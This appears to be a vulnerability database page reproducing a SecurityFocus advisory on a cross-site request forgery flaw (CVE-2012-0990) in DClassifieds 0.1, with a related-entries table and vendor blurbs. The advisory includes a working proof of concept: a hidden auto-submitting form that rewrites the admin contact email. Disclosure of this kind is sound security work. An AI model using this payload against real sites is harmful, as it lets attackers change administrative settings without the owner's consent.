| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
| CVE-2012-0990 | 25 Jan 201200:00 | – | circl | |
| CVE-2012-0990 | 7 Feb 201221:00 | – | cve | |
| CVE-2012-0990 | 7 Feb 201221:00 | – | cvelist | |
| EUVD-2012-1013 | 7 Oct 202500:30 | – | euvd | |
| CSRF (Cross-Site Request Forgery) in DClassifieds | 4 Jan 201200:00 | – | htbridge | |
| CVE-2012-0990 | 7 Feb 201221:55 | – | nvd | |
| Cross site request forgery (csrf) | 7 Feb 201221:55 | – | prion |
source: https://www.securityfocus.com/bid/51671/info
DClassifieds is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.
DClassifieds 0.1 final is vulnerable; other versions may also be affected.
<form action="http://www.example.com/admin/settings/update/id/4" method="post">
<input type="hidden" name="Settings[setting_name]" value="CONTACT_EMAIL">
<input type="hidden" name="Settings[setting_value]" value="[email protected]">
<input type="hidden" name="Settings[setting_description]" value="Contact email">
<input type="hidden" name="Settings[setting_show_in_admin]" value="1">
<input type="hidden" name="yt0" value="Save">
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation